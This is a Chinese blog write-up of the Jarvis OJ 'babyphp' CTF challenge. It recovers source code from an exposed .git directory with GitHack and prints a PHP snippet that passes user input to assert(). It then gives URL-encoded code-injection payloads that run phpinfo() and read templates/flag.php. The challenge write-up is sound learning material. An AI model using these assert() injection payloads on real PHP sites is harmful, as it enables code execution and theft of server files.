AI智能
改变未来
当前位置:爱站程序员基地 > 全栈知识 > PHP开发 > 正文

Jarvis OJ babyphp

2021-06-28 分类:PHP开发 评论(0)

babyphp

根据提示可知第一步是git源码泄露
我们用GitHack来获取源码分析

py -2 GitHack.py http://web.jarvisoj.com:32798/.git/

得到的index.php中含有重要PHP代码

<?phpif (isset($_GET[\'page\'])) {$page = $_GET[\'page\'];} else {$page = \"home\";}$file = \"templates/\" . $page . \".php\";assert(\"strpos(\'$file\', \'..\') === false\") or die(\"Detected hacking attempt!\");assert(\"file_exists(\'$file\')\") or die(\"That file doesn\'t exist!\");?>
  • 需要传个page参数
  • file = “templates/” . $page . “.php”
  • page不能包含…
  • 拼接file变量达到代码执行目的
page=\') or phpinfo();%23    即变成file_exists(\'\') or phpinfo();# ,结果为执行phpinfo()。注意最后的#必须编码(没太清楚为什么)
page=\')%20or%20phpinfo();%23
page=\') or print_r(file_get_contents(\'templates/flag.php\');%23即变成file_exists(\'\') or print_r(file_get_contents(\'templates/flag.php\');%#
最终payload:page=\')%20or%20print_r(file_get_contents(\'templates/flag.php\'));%23

空格和#需要url编码成%20和%23

赞(0) 打赏
未经允许不得转载:爱站程序员基地 » Jarvis OJ babyphp
标签:

相关推荐

热门文章

热门标签

源码 (2093)Java开发 (1438)Python开发 (1301)夸克网盘 (1297)vps商家 (1289)阿里云盘 (1267)Linux (1189)JavaScript (1119)PHP开发 (1058)计算机网络 (1055)MySQL (1015)Go语言 (985)UI/UE (975)CSS (970)人工智能 (933)Shell (930)安卓 (891)Android开发 (873)C# (861)ASP (815)网站架构 (798)IOS开发 (782)JQuery (759)Oracle (684)网络资源 (575)实用工具 (350)微信 (250)C语言/C++ (245)百度网盘 (208)github (155)